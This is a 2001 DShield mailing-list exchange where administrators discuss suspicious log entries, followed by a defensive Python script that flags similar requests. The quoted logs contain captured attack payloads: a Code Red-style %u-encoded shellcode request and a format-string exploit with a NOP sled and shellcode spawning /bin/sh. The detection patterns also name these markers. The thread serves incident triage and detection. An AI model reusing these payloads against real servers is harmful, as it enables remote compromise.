[Dshield] buffer overflow?

Stephane Nasdrovisky stephane.nasdrovisky at uniway.be
Thu Nov 15 15:26:20 GMT 2001


The only unusual buffer overflow probe I've seen is this one:
195.130.248.102 - - [21/Sep/2001:00:19:31 +0200]
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

It looks like Code Red, but lacks the "default.ida?". I guess it was a script kiddie in search of new feelings.

ALEPH0 wrote:

> Found these in my logs (copy/paste from vi).  Looks like a buffer overflow
> to get a shell attempt.  They are in repetitive groups and on each of my
> servers on one of my networks.  Anyone know this one in particular and if I
> should be concerned?  What I don't know is what is SERVER here.
>
> Nov 14 20:43:31 hostname SERVER[4302]: Dispatch_input: bad request line
> 'BBì¿í¿î¿ï¿XXXXXXXXXXXXXXXXXX%.172u%300$n%.17u%301$n%.253u%302$n%.192u%303$n
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
> ~P~P~P~P~P~P~P~P~P~P1Û1É1À°FÍ~@~Iå1Ò²f~I
> 1É~IËC~I]øC~I]ôK~IMü~MMôÍ~@1É~IEôCf~I]ìfÇEî^O'~IM ~MEì~IEøÆEü^P~I ~MMôÍ~@~I
> CCÍ~@~I CÍ~@~IÃ1ɲ?~I Í~@~I
> AÍ~@ë^X^~Iu^H1À~HF^G~IE^L°^K~Ió~MM^H~MU^LÍ~@èã/bin/sh'
>
> I also run a bunch of homebuilt fake logging daemons on many trojan ports
> and found on this same network a lot of activity on port 27374 starting a
> couple days ago.

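A defender-side triage sketch for the two request shapes quoted in this thread, added here as an example and not part of either poster's message: it labels logged request strings that carry runs of `%uXXXX` escapes (with or without `default.ida?`), printf-style `%n` write directives, long filler runs, or a `/bin/sh` string. The sample lines, label names and thresholds are constructed assumptions.

```python
import re

# Heuristic patterns (thresholds are assumptions, tune them for your own logs).
PCT_U = re.compile(r"(?:%u[0-9a-fA-F]{4}){4,}")        # 4+ consecutive %uXXXX escapes
FMT_WRITE = re.compile(r"%(?:\d+\$)?(?:hh|h|ll|l)?n")  # %n or positional %300$n directive
FILLER = re.compile(r"(.)\1{15,}")                     # one character repeated 16+ times


def classify(request):
    """Return the set of heuristic labels matching one logged request string."""
    labels = set()
    if PCT_U.search(request):
        labels.add("percent-u-run")
    if "default.ida?" in request:
        labels.add("default-ida")          # the marker the reply says was missing
    if FMT_WRITE.search(request):
        labels.add("format-write")         # points at a format string bug, not an overflow
    if FILLER.search(request):
        labels.add("filler-run")
    if "/bin/sh" in request:
        labels.add("shell-path")
    return labels


def triage(requests):
    """Map the index of each suspicious request to its labels; clean lines are omitted."""
    hits = {}
    for index, request in enumerate(requests):
        labels = classify(request)
        if labels:
            hits[index] = labels
    return hits


# Constructed sample requests, shaped like the log entries in the thread (not real payloads).
SAMPLES = [
    "GET /index.html HTTP/1.0",
    "GET /default.ida?" + "N" * 32 + "%u4141" * 6 + " HTTP/1.0",
    "X" * 32 + "%u4141" * 6,
    "BB" + "X" * 18 + "%.172u%300$n%.17u%301$n" + " /bin/sh",
]

if __name__ == "__main__":
    for index, labels in triage(SAMPLES).items():
        print(index, sorted(labels))
```
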